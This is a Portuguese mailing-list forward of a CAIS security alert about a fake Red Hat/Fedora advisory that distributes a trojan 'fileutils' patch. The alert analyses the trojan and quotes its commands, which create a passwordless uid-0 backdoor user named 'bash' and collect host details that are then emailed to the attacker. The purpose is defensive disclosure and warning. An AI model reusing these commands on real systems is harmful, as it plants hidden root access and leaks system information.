Senhores, Recebi este comunicado e achei inteesante repasar. Prezados,
O CAIS esta' acompanhando desde ontem a divulgacao de uma mensagem falsa cujo conteudo tenta se passar por um alerta de seguranca da distribuicao Fedora. Tal alerta faz referencia ao site http://fedora-redhat.com/, onde e' disponibilizada uma falsa correcao, fileutils-1.0.6.patch.tar.gz (68349c219d941209af8f7c968b89d622). Este arquivo e' composto dos seguintes arquivos: 990084 Out 23 16:06 fileutils-patch.bin (7d6f449488f8e7360c74101c20e4052c) 14297 Out 23 13:02 inst.c (c6b4e5e288b6ab9ea6157794df811d8f) 32 Out 22 21:59 Makefile (fe6c3513f6f0fa47392e89071ba9cde6) Analise: De acordo com as analises realizadas nos arquivos, esta falsa correcao nao explora nenhuma vulnerabilidade no sistema. Ela depende da acao do usuario que, ao instalar a suposta correcao como usuario "root", permite que as acoes descritas abaixo sejam executadas: . O script "inst.c" deve ser compilado e executado. Ele verifica se o usuario esta executando como "root"; . Ao ser executado, um usuario chamado "bash" � criado com permissoes de super-usuario e sem senha; . O script cria um arquivo chamado /tmp/mama, com o conteudo dos seguintes comandos: echo "Inca un root frate belea: " >> /tmp/mama adduser -g 0 -u 0 -o bash >> /tmp/mama passwd -d bash >> /tmp/mama ifconfig >> /tmp/mama uname -a >> /tmp/mama uptime >> /tmp/mama sshd >> /tmp/mama echo "user bash stii tu" >> /tmp/mama . E' enviado um e-mail para [EMAIL PROTECTED], com o Subject: "Inca o roata", com o conteudo do arquivo /tmp/mama . O script cria o seguinte diretorio: /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." " . saida da execucao do binario "inst", resultante da compilacao do codigo-fonte inst.c incluso no pacote: identifying the system. This may take up to 2 minutes. Please wait ... ./inst: sshd: command not found System looks OK. Proceeding to next step. Patching "ls": ########### Patching "mkdir": ########### System updated and secured successfuly. You may erase these files. [EMAIL PROTECTED] fileutils-1.0.6.patch]# Mais informacoes: . [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" http://lists.netsys.com/pipermail/full-disclosure/2004-October/028031.html . RedHat.com - Security and Updates http://www.redhat.com/security Os alertas enviados pela RedHat tem como origem o endereco de email [EMAIL PROTECTED] e sao assinados digitalmente com uma chave PGP disponivel no seguinte endereco: http://www.redhat.com/security/team/key.html O CAIS recomenda que sempre seja verificada autenticidade de mensagens enviadas por grupos de seguranca e representantes de empresas. Na maioria dos casos e' possivel verificar a integridade dos arquivos a serem instalados. Os Alertas do CAIS tambem sao oferecidos no formato RSS/RDF: http://www.rnp.br/cais/alertas/rss.xml Atenciosamente, ################################################################ # CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA (CAIS) # # Rede Nacional de Ensino e Pesquisa (RNP) # # # # [EMAIL PROTECTED] http://www.cais.rnp.br # # Tel. 019-37873300 Fax. 019-37873301 # # Chave PGP disponivel http://www.rnp.br/cais/cais-pgp.key # ################################################################ -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBQX1ICekli63F4U8VAQEsAQP+MZpypjATgjkh6ec5/lnnsIM1KdZS43n/ R2oRI6E4L7w08lcMgUmRQIiV5cDq0xNm3/vRsGxubwN82ZIMjkqHp964aIpEUB14 J+aQ5CZYELyfk5CpfbjVZPsobodgcUJF8AkqdzzqfllKPUQXo8IQ+FlYDKmrqPJN AkS7CdwHBaI= =OWs+ -----END PGP SIGNATURE----- --------------------------------------------------------------------------- Esta lista � patrocinada pela Conectiva S.A. Visite http://www.conectiva.com.br Arquivo: http://bazar2.conectiva.com.br/mailman/listinfo/linux-br Regras de utiliza��o da lista: http://linux-br.conectiva.com.br FAQ: http://www.zago.eti.br/menu.html
